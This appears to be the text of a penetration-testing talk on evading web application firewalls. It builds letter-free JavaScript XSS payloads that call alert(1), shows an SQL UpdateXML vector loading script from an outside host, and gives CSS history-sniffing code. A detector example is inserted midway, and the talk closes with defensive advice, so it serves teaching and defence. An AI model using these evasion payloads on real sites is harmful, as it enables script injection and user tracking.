Bypassing Web Application Firewalls
1. Bypassing Web Application Firewalls (WAFs)
Ing. Pavol Lupták, CISSP, CEH
Lead Security Consultant
www.nethemba.com
2. Nethemba – All About Security
Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)
Core business: all kinds of penetration tests, comprehensive web application security audits, local system and wifi security audits, security consulting, forensic analysis, secure VoIP, ultra-secure systems
OWASP activists: leaders of the Slovak/Czech OWASP chapters, co-authors of the most recognized OWASP Testing Guide v3.0, working on the new version
We are the only company in Slovakia/Czech Republic that offers:
Penetration tests and security audits of SAP
Security audits of smart RFID cards
Unique own and sponsored security research in many areas (see our references: vulnerabilities in public transport SMS tickets, cracking of the most used Mifare Classic RFID cards)
3. What are WAFs?
Emerged from IDS/IPS, focused on the HTTP protocol and HTTP-related attacks
Usually contain a lot of complex regexp rules to match
Support special features like cookie encryption, CSRF protection, etc.
Except for the free mod_security, they are quite expensive (and often there is no correlation between the price and their filtering capabilities)
4. WAFs implementations
Usually they are deployed in "blacklisting mode", which is more vulnerable to bypasses and targeted attacks
Knowing the application "context" (the types of allowed inputs) is necessary to deploy the more secure "whitelisting mode"
All WAFs can be bypassed
A WAF is just a workaround, but from the security point of view it can be cost-effective
5. WAF filter rules
The filter rules directly determine WAF effectiveness
For most WAF vendors they are closely guarded secrets, yet the most determined attackers are able to bypass them without seeing the actual rules
Open-source WAFs (mod_security, PHPIDS) publish their rules, which allows more scrutiny by skilled penetration testers
7. Yes, a WAF may also be vulnerable!
A WAF also increases the attack surface of the target organization
A WAF may be the target of, and vulnerable to, malicious attacks, e.g. XSS, SQL injection, denial-of-service attacks, remote code execution vulnerabilities
These vulnerabilities have been found in all types of WAF products(!)
9. JavaScript obfuscation
JavaScript has very powerful features
A JavaScript payload is used in XSS attacks
It is full of evals, expression closures, generator expressions, iterators, special characters and shortcuts
Supports a lot of encodings (Unicode multibyte characters, hexadecimal, octal, and combinations of all of them)
Supports XOR, "encryption", Base64
10. Non-alphanumeric JavaScript code
Even if only a few characters are allowed, it is possible to construct fully functional code:
_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___; // _=1, $=0, __=2, ___=3, ____=4, _____=5
$$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_]; // "constructor"
$$$=(($!=$)+"")[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$]; // "alert"
$_$=({}+"")[+_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___]; // the string argument
($)[$$][$$]($$$+"('"+$_$+"')")() // (0).constructor.constructor is Function
([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](~Á)
11. Let's bypass the WAF!
Example situation: the WAF blocks alphabetic characters and numbers (probably not a very realistic situation, just a proof-of-concept :)
It allows only a few special characters: (){}_=[];$"!+<>
Let's generate fully non-alphanumeric JavaScript code!
16. Gain alpha characters without directly using them
When a JavaScript object is defined with an object literal and concatenated with a string, the result is "[object Object]"
_={}+''; // "[object Object]"
alert(_[1]) // returns the 'o' character
17. Generate the string "alert" without using any alphanumeric characters
Let's start with 'a'
What JavaScript value contains 'a'?
We can use 'NaN' (Not a Number)
Access an empty array at index 0 (undefined) and convert it to a number (NaN)
+[][+[]] // result: NaN
18. Generating the 'a' character
'NaN'[1] is 'a'
++[[]][+[]] // 1
+[][+[]]+[] // result string: "NaN"
(+[][+[]]+[])[++[[]][+[]]] // 'a'
We have the character 'a'
19. Generating the 'l' character
Use boolean false
We can use the ! (NOT) operator
e.g. ''==0 // true
Apply the NOT operator to an empty array to obtain a boolean, wrap it in [] and convert it to a string
([![]]+[]) // string "false"
20. Generating the 'l' character
++[++[[]][+[]]][+[]] // 2
([![]]+[]) // string "false"
'false'[2] = ([![]]+[])[++[++[[]][+[]]][+[]]] // 'l'
We have the 'l' character!
21. Generating the 'e' character
It's easy, we can use boolean true
([!![]]+[]) // string "true"
++[++[++[[]][+[]]][+[]]][+[]] // 3
'true'[3] = ([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] // 'e'
And we have the 'e' character!
22. Generating the 'r' character
It's easy, we can use boolean true
([!![]]+[]) // string "true"
++[[]][+[]] // 1
'true'[1] = ([!![]]+[])[++[[]][+[]]] // 'r'
And we have the 'r' character!
23. Generating the 't' character
It's easy, we can use boolean true
([!![]]+[]) // string "true"
+[] // 0
'true'[0] = ([!![]]+[])[+[]] // 't'
And we have the 't' character!
24. And now we have the 'alert' string!
(+[][+[]]+[])[++[[]][+[]]]+
([![]]+[])[++[++[[]][+[]]][+[]]]+
([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+
([!![]]+[])[++[[]][+[]]]+
([!![]]+[])[+[]] // string 'alert'
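Added example, not from the slides: a keyword blacklist rule of the kind a WAF applies, run beside a structural check over the obfuscated 'alert' string built above. The threshold values and the sample inputs are assumptions constructed for this demonstration.

```javascript
// Added example (not the slides' code): why a keyword blacklist misses the
// non-alphanumeric 'alert' string, and a structural check that does not
// depend on keywords. Thresholds are constructed for this demo.

// Constructed sample: the obfuscated 'alert' from the slide, joined on one line.
const OBFUSCATED_ALERT =
  "(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+" +
  "([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+" +
  "([!![]]+[])[+[]]";

// A typical blacklist rule: look for dangerous identifiers by name.
const KEYWORD_BLACKLIST = /\b(alert|eval|constructor|sort|function)\b/i;

function blacklistMatches(input) {
  return KEYWORD_BLACKLIST.test(input);
}

// Structural measure: share of non-alphanumeric characters, and the longest
// unbroken run drawn from the bracket/operator alphabet the trick uses.
function structuralScore(input) {
  const chars = input.replace(/\s+/g, "");
  let symbols = 0, run = 0, longestRun = 0;
  for (const ch of chars) {
    if (/[A-Za-z0-9]/.test(ch)) { run = 0; continue; }
    symbols += 1;
    if ("[]()!+{}$_=<>".includes(ch)) {
      run += 1;
      longestRun = Math.max(longestRun, run);
    } else {
      run = 0;
    }
  }
  const symbolRatio = chars.length ? symbols / chars.length : 0;
  return { symbolRatio, longestRun };
}

// Flag input that is almost entirely symbols and contains a long operator run.
function looksLikeNonAlphanumericJs(input, minRatio = 0.9, minRun = 24) {
  const s = structuralScore(input);
  return s.symbolRatio >= minRatio && s.longestRun >= minRun;
}

// Decision combining both checks, so the gap between them is visible per input.
function classify(input) {
  if (blacklistMatches(input)) return "blocked-by-blacklist";
  if (looksLikeNonAlphanumericJs(input)) return "flagged-by-structure";
  return "allowed";
}

// Constructed inputs: plain keyword, obfuscated form, benign user text.
const SAMPLES = { plain: "alert(1)", obfuscated: OBFUSCATED_ALERT, benign: "Price: $10 (see [1])" };
```

The obfuscated string contains no letters at all, so the keyword rule never fires on it; the structural score is a heuristic and only a stand-in for the context-aware whitelisting the deck recommends.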
25. How to execute the code of our choice?
It is necessary to obtain the window object to access all of its properties
If you can access a constructor, you can reach the Function constructor to execute arbitrary code
The shortest possible way to get window is:
alert((1,[].sort)()) // shows the window object!
Works in all browsers except IE
26. How to generate the 'sort' string
We know how to generate the string 'alert'
We need to generate the string 'sort'
'false'[3] = ([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] // 's'
We can get 'o' from []+{} ("[object Object]")
([]+{})[++[[]][+[]]] // 'o'
We have already generated 'r' and 't'
28. Let's build it together: call alert(1)
(1,[].sort)().alert(1)
After changing the number 1 and all alpha characters to their obfuscated version we get:
([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()
[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]]
(++[[]][+[]])
// calls alert(1)!
29. How to call any arbitrary JavaScript function
Using the array constructor (accessing the constructor twice from an array object returns Function):
[].constructor.constructor("alert(1)")()
We still need to generate the remaining letters 'c', 'n', 'u'; they can be taken from the string form of the [].sort function:
function sort() { [native code] }
30. SQL obfuscation
What is obfuscation of a SQL injection vector?
Different DBMSs have different SQL syntax; most of them support Unicode, Base64, hex, octal and binary representations, escaping, and hashing algorithms (MD5, SHA1)
Many "blacklisted" characters can be replaced by their functional alternatives (e.g. 0xA0 in MySQL)
Obfuscated comments: it is difficult to determine what is a comment and what is not
32. New SQL features
MySQL/PostgreSQL support XML functions:
SELECT UpdateXML('<script x=_></script>', '/script/@x', 'src=//0x.lv');
HTML5 supports local DB storage (SQLite 3.1+, the openDatabase object), which can be misused for persistent XSS and local SQL injection attacks
34. Summary
WAFs are just workarounds!
The best solution is to care about security in every SDLC phase and strictly validate all inputs and outputs in the application
Use whitelisting instead of blacklisting (both in the application and in the WAF!)
Use multi-layer security: a 3-layer database architecture or database firewalls
For SQL, use "prepared" statements
For HTML, use HTML Purifier or the OWASP AntiSamy project
35. References
Web Application Obfuscation
http://www.amazon.com/WebApplicationObfuscati
XSS Attacks: Cross Site Scripting Exploits and Defense
http://www.amazon.com/XSSAttacksScriptingExp
Special thanks to Mario Heiderich and Stefano Di Paola
37. Clickjacking protection
Block framing using X-Frame-Options: NEVER
<body>
<script>
if (top!=self) document.write('<plaintext>');
</script>
...
38. CSS history attack
<style>
a { position: relative; }
a:visited { position: absolute; }
</style>
<a id="v" href="http://www.google.com/">Google</a>
<script>
var l=document.getElementById("v");
var c=getComputedStyle(l).position;
c=="absolute"?alert("visited"):alert("not visited");
</script>
39. CSS history exploitation methods
Social network deanonymization attacks
Session ID/CSRF token local brute-force attack
LAN scanners
Fixed in Firefox 4.0; current browsers are vulnerable